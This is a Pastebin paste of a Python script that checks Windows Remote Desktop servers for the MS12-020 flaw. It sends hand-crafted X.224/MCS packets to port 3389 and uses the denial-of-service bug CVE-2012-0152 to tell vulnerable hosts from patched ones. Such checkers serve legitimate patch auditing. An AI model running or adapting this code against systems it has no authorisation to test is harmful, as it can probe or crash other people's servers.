SHARE
TWEET

MS12-020 remote checker

a guest Mar 28th, 2012 502 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. #
  4. # MS12-020 checker (no BSOD)
  5. #
  6. # Use DoS bug (CVE-2012-0152) for check
  7. #
  8. # Update: remove RDP negotiation to use standard RDP for Windows 7
  9. #
  10. # by Worawit Wang (sleepya)
  11. #
  12.  
  13. import sys
  14. import socket
  15. from struct import pack,unpack
  16.  
  17. host = sys.argv[1]
  18.  
  19. def make_tpkt(data):
  20.         return pack("!BBH", 3, 0, 4+len(data)) + data
  21.  
  22. def make_x224(type, data):
  23.         return pack("!BB", 1+len(data), type) + data
  24.  
  25.  
  26. sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  27. sk.settimeout(10)
  28. sk.connect((host,3389))
  29.  
  30. # craft connection request
  31. # x224 type 0xe0
  32. # - dst_ref, src_ref, class_opts, data
  33. x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0))
  34. sk.send(make_tpkt(x224_1))
  35. data = sk.recv(8192)
  36. if data != "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00":
  37.         print "Cannot check"
  38.         sys.exit()
  39.  
  40. # x224 type 0xf0 (Data TPDU)
  41. # - EOT (0x80)
  42. x224_2 = make_x224(0xf0, pack("!B", 0x80))
  43.  
  44. # craft connect-initial with gcc
  45. target_params = (""
  46.         + "\x02\x01\x22" # maxChannelIds
  47.         + "\x02\x01\x20" # maxUserIds
  48.         + "\x02\x01\x00" # maxTokenIds
  49.         + "\x02\x01\x01" # numPriorities
  50.         + "\x02\x01\x00" # minThroughput
  51.         + "\x02\x01\x01" # maxHeight
  52.         + "\x02\x02\xff\xff" # maxMCSPDUSize
  53.         + "\x02\x01\x02" # protocolVersion
  54. )
  55. min_params = (""
  56.         + "\x02\x01\x01" # maxChannelIds      
  57.         + "\x02\x01\x01" # maxUserIds          
  58.         + "\x02\x01\x01" # maxTokenIds        
  59.         + "\x02\x01\x01" # numPriorities      
  60.         + "\x02\x01\x00" # minThroughput      
  61.         + "\x02\x01\x01" # maxHeight          
  62.         + "\x02\x01\xff" # maxMCSPDUSize
  63.         + "\x02\x01\x02" # protocolVersion
  64. )
  65. max_params = (""
  66.         + "\x02\x01\xff" # maxChannelIds          
  67.         + "\x02\x01\xff" # maxUserIds              
  68.         + "\x02\x01\xff" # maxTokenIds            
  69.         + "\x02\x01\x01" # numPriorities          
  70.         + "\x02\x01\x00" # minThroughput          
  71.         + "\x02\x01\x01" # maxHeight              
  72.         + "\x02\x02\xff\xff" # maxMCSPDUSize
  73.         + "\x02\x01\x02" # protocolVersion
  74. )
  75. mcs_data = (""
  76.         + "\x04\x01\x01" # callingDomainSelector
  77.         + "\x04\x01\x01" # calledDomainSelector
  78.         + "\x01\x01\xff" # upwardFlag
  79.         + "\x30" + pack("B", len(target_params)) + target_params
  80.         + "\x30" + pack("B", len(min_params)) + min_params
  81.         + "\x30" + pack("B", len(max_params)) + max_params
  82.         + "\x04\x00" # userData
  83. )
  84.  
  85. # \x7f\x65  BER: APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
  86. mcs = "\x7f\x65" + pack("!B", len(mcs_data))
  87. sk.send(make_tpkt(x224_2 + mcs + mcs_data))
  88.  
  89. # craft attach user request
  90. sk.send(make_tpkt(x224_2 + "\x28"))
  91. data = sk.recv(8192)
  92. user1 = unpack("!H", data[9:11])[0]
  93.  
  94. sk.send(make_tpkt(x224_2 + "\x28"))
  95. data = sk.recv(8192)
  96. user2 = unpack("!H", data[9:11])[0]
  97.  
  98. # craft channel join request
  99. sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user1, user2+1001)))
  100. data = sk.recv(8192)
  101. if data[7:9] == "\x3e\x00":
  102.         print "!!! VULN !!!"
  103.         # below for safety from BSOD
  104.         sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user2, user2+1001)))
  105.         data = sk.recv(8192)
  106. else:
  107.         print "patched"
  108.  
  109. sk.close()
RAW Paste Data
Top